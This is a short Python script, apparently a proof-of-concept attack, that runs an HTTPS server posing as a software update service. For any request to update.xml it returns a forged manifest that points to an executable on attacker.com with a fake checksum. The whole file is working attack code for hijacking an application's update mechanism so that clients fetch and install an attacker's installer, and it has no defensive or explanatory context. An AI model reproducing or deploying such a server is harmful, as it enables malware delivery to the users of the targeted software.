from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

class MaliciousUpdater(BaseHTTPRequestHandler):
    def do_GET(self):
        if "update.xml" in self.path:
            self.send_response(200)
            self.send_header("Content-type", "text/xml")
            self.end_headers()
            # Malicious update pointing to attacker-controlled executable
            xml = """<?xml version="1.0"?>
<update>
    <version>8.8.9</version>
    <url>https://attacker.com/malicious_installer.exe</url>
    <checksum>fake1234</checksum>
</update>"""
            self.wfile.write(xml.encode())
        else:
            self.send_error(404)

httpd = HTTPServer(("0.0.0.0", 443), MaliciousUpdater)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True)
httpd.serve_forever()